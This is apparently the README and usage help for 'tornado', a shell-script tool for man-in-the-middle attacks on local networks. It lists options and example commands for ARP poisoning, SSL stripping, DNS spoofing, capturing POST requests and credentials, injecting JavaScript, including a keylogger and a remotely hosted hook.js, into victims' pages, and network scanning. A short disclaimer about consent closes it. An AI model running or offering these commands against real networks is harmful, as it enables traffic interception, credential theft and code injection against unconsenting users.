git clone https://github.com/rebellionil/tornado
cd tornado
bash setup.sh
βββββββββ βββββββ βββββββ ββββ βββ ββββββ βββββββ βββββββ
βββββββββββββββββββββββββββββββ ββββββββββββββββββββββββββββ
βββ βββ βββββββββββββββββ ββββββββββββββ ββββββ βββ
βββ βββ ββββββββββββββββββββββββββββββββ ββββββ βββ
βββ ββββββββββββ ββββββ βββββββββ ββββββββββββββββββββ
βββ βββββββ βββ ββββββ ββββββββ ββββββββββ||βββββββ
- Version 0.2 [CODED BY MAGDY MOUSTAFA] ||||
- github.com/rebellionil/tornado |__||||__|
- facebook.com/rebellionil ++++++++++
||||||||||
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β -h --help => guess what ? β
β -I --iface-info => print connected interfaces information and exit β
β -t --target <TARGET> => specify target β
β -g --gateway <Gateway> => specify gateway β
β -i --interface <iface> => specify an interface β
β -o --savelog <NAME> => save sslstrip+ results β
β -f --forward <on/off> => don't forward traffic [on|OFF] β
β -c --no-colors => remove colors from output [on|OFF] β
β -d --driftnet => enable driftnet to extract images from session pcap file [on|OFF] β
β -u --urlsnarf => log GET/POST requests with urlsnarf [on|OFF] β
β -s --silent => run arpspoof and dns2proxy in background [on|OFF] β
β -k --tshark => capture detailed post requests info with tshark [on|OFF] β
β -e --ettercap => capture post requests with ettercap (RECOMMENDED) [on|OFF] β
β -m --tcpdump => capture post requests with TCPdump [on|OFF] β
β -K --tskark+ => capture GET/POST requests headers with tshark [on|OFF] β
β -p --dnsspoof => DNS spoofing with dns2proxy (DOMAIN => FAKE_IP) [on|OFF] β
β -r --iptraf => monitor network traffic with iptraf-ng [on|OFF] β
β -a --etherape => monitor network traffic with etherape [on|OFF] β
β -C --no-check => don't verify if targets are reachable or not [on|OFF] β
β -x --burp => intercept captured traffic with burpsuite β
β -X --mitmproxy => intercept captured traffic with MITMproxy β
β -H --hsts => intercept captured traffic with sslstrip+,dns2proxy β
β -w --mitmproxy-args => customize mitmproxy performance β
β -l --js-url <js URL> => inject JS url in page content [ HTTP ] β
β -L --js-code <js code> => inject JS code from JS file [must be one line] [ HTTP ] β
β -G --js-keylogger => inject JS keylogger in html pages [ HTTP ] β
β -M --map-lan <nmap args> => perform a nmap network scan from tornado ! β
β usage. ./tornado.sh <options> β
β eg. ./tornado.sh -t 192.168.1.1/24 --map-lan -F β
β eg. ./tornado.sh -t 192.168.1.1/24 --map-lan --script vuln -p 80 β
β eg. ./tornado.sh -i wlan0 -t 192.168.1.50 -g 192.168.1.1 -a --mitmproxy --mitmproxy-args --no-mouse β
β eg. ./tornado.sh -i wlan0 -t 192.168.1.1/24 -g 192.168.1.1 --ettercap --hsts -o ssl.log β
β eg. ./tornado.sh -i wlan0 -t 192.168.1.10 -g 192.168.1.1 -f β
β eg. ./tornado.sh -i wlan0 -t 192.168.1.10 -g 192.168.1.1 -l http://192.168.1.100:3000/hook.js β
β eg. ./tornado.sh -i wlan0 -t 192.168.1.10 -g 192.168.1.1 -L alert.js --js-keylogger β
β eg. ./tornado.sh -i wlan0 -t 192.168.1.2,192.168.1.5,192.168.1.10 -g 192.168.1.1 --hsts -e -k -d -u β
β eg. ./tornado.sh -i wlan0 -t 192.168.1.5 -g 192.168.1.1 --burp β
β eg. ./tornado.sh -i wlan0 -t 192.168.1.5 -g 192.168.1.1 --dnsspoof dnsfile.txt β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ[root@parrot]β[~/tornado]
ββββΌ #
Version release: 0.2-STABLE
Author: Magdy Moustafa [ rebellionil ]
Distros Supported: Linux Ubuntu, Kali, Debian, BackBox, Parrot OS
The author does not hold any responsibility for the bad use of this tool,
remember that attacking targets without prior consent it's illegal and punished by law.
1ΒΊ - Tornado will fail if target system its protected againt arp poison atacks
2ΒΊ - target system sometimes needs to clear the net cache for arp poison to be effective
3ΒΊ - many attacks described in tornado may be dropped by the target HSTS detection sys.
nmap, iptraf-ng, sslstrip2, dns2proxy, mitmproxy, burpsuite, tshark, tcpdump, ettercap, etherape, urlsnarf, arpspoof, driftnet, arp-scan